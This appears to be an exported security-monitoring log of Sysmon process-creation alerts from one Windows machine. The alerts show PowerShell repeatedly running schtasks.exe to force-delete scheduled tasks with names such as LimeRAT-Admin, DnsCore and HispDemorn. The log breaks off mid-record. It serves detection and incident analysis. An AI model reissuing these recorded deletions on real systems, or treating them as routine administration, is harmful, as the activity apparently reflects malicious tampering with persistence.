C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo 
-NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:05.232228100Z"",""eventRecordID"":""2527"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:05.229\r\nProcessGuid: {df9fc3d3-b37d-5ecf-0000-001027ca1e00}\r\nProcessId: 5044\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:05.229"",""processGuid"":""{df9fc3d3-b37d-5ecf-0000-001027ca1e00}"",""processId"":""5044"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 
(WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ECDnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.472",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:05.207 +ProcessGuid: {df9fc3d3-b37d-5ecf-0000-001047c81e00} +ProcessId: 8060 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: 
{df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:05.209885900Z"",""eventRecordID"":""2526"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:05.207\r\nProcessGuid: {df9fc3d3-b37d-5ecf-0000-001047c81e00}\r\nProcessId: 8060\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo 
-NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:05.207"",""processGuid"":""{df9fc3d3-b37d-5ecf-0000-001047c81e00}"",""processId"":""8060"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.445",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:05.186 +ProcessGuid: {df9fc3d3-b37d-5ecf-0000-0010a5c61e00} +ProcessId: 3812 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for Windows Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: 
{df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:05.188257100Z"",""eventRecordID"":""2525"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:05.186\r\nProcessGuid: {df9fc3d3-b37d-5ecf-0000-0010a5c61e00}\r\nProcessId: 3812\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:05.186"",""processGuid"":""{df9fc3d3-b37d-5ecf-0000-0010a5c61e00}"",""processId"":""3812"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for Windows Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.416",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:05.162 +ProcessGuid: {df9fc3d3-b37d-5ecf-0000-0010c9c41e00} +ProcessId: 516 
+Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:05.164209800Z"",""eventRecordID"":""2524"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:05.162\r\nProcessGuid: {df9fc3d3-b37d-5ecf-0000-0010c9c41e00}\r\nProcessId: 516\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:05.162"",""processGuid"":""{df9fc3d3-b37d-5ecf-0000-0010c9c41e00}"",""processId"":""516"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 
5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.403",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:05.142 +ProcessGuid: {df9fc3d3-b37d-5ecf-0000-0010d2c21e00} +ProcessId: 6324 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN LimeRAT-Admin /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:05.144667500Z"",""eventRecordID"":""2523"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:05.142\r\nProcessGuid: {df9fc3d3-b37d-5ecf-0000-0010d2c21e00}\r\nProcessId: 6324\r\nImage: 
C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:05.142"",""processGuid"":""{df9fc3d3-b37d-5ecf-0000-0010d2c21e00}"",""processId"":""6324"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN LimeRAT-Admin /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.384",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:05.120 +ProcessGuid: {df9fc3d3-b37d-5ecf-0000-0010e2c01e00} +ProcessId: 7900 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HispDemorn /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:05.122434700Z"",""eventRecordID"":""2522"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:05.120\r\nProcessGuid: {df9fc3d3-b37d-5ecf-0000-0010e2c01e00}\r\nProcessId: 7900\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:05.120"",""processGuid"":""{df9fc3d3-b37d-5ecf-0000-0010e2c01e00}"",""processId"":""7900"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HispDemorn /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.379",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:05.097 +ProcessGuid: {df9fc3d3-b37d-5ecf-0000-001003bf1e00} +ProcessId: 6636 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN werclpsyport /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
